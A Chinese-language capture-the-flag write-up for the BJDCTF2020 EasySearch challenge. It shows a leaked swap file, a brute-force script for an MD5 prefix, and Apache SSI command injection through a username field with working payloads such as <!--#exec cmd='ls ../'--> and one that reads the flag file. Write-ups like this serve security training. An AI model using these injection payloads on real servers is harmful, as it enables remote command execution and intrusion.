Apache SSI远程命令执行漏洞

来自

[BJDCTF2020]EasySearch

一打开是一个登录框，首先试了试sql注入，没啥反应。源码也没啥东西，用dirsearch一扫扫到个index.php.swp，直接访问得到验证源码：

审计一下，它对登录框的用户名没啥要求，但是密码的MD5值前六位必须是6d0bc1，写个脚本梭一下：

import hashlib

a = "0123456789"
for o in a:
    for p in a:
        for q in a:
            for r in a:
                for s in a:
                    for t in a:
                        for u in a:
                            b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
                            md5 = hashlib.md5(b.encode('utf-8')).hexdigest()
                            if((md5[0:6])=='6d0bc1'):
                                print(b)

也可以：

<?php
    ob_start();
    function get_hash(){
        $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
        $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
        $content = uniqid().$random;
        return sha1($content); 
    }
    header("Content-Type: text/html;charset=utf-8");
    ***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
            ***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
            echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
    ***
    }
    ***
?>

得到：

随便输个admin和2020666登录成功。

但是进去啥也没有。

这时候想到bp抓包看一下，resp看到个东西：

直接访问，看到用户名这里有回显：

搜了下发现这里是Apache的SSI远程命令执行漏洞。

借用https://blog.csdn.net/Yb_140/article/details/127548454

解释一下SSI是什么：

SSI是嵌入HTML页面中的指令，在页面被提供时由服务器进行运算，以对现有HTML页面增加动态生成的内容，而无须通过CGI程序提供其整个页面，或者使用其他动态技术。

从技术角度上来说，SSI就是在HTML文件中，可以通过注释行调用的命令或指针，即允许通过在HTML页面注入脚本或远程执行任意代码。

当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令。

题目中username被写入了shtml文件，就可以将username改为

<!--#exec cmd="ls"-->

再用这个shtml去访问：

没找到flag。

推测在根目录，这里用的命令：(记得url编码)

<!--#exec cmd="ls /"-->

啥也没有，奇怪了。

那就猜是不是就在网站上一个目录，用命令：（这里加号+也可以用空格%20写）

<!--#exec+cmd="ls+../"-->

url编码，再传再看：

发现flag。

然后用命令：

<!--#exec+cmd="cat+../flag_990c66bf85a09c664f0b6741840499b2"-->

再传url编码后的，得到flag：

提一嘴这里我如果把加号 + url编码成了%2B传进去就ERROR了，只能传原始的加号 + 。

但是空格%20就没有这个问题。